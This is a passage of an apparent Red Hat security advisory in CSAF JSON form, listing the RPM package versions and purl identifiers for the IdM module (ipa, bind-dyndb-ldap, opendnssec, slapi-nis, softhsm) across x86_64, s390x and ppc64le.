"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
